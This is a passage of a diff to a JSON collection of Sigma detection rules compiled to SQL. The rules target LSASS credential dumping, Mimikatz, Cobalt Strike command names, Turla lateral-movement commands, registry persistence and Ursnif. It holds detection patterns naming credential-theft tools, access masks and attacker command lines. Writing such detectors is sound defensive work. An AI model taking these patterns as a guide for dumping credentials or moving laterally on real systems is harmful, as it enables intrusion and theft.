'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR 
((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) 
OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": 
"Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], 
"falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. 
This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' 
ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 
'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function 
from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": 
"proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE 
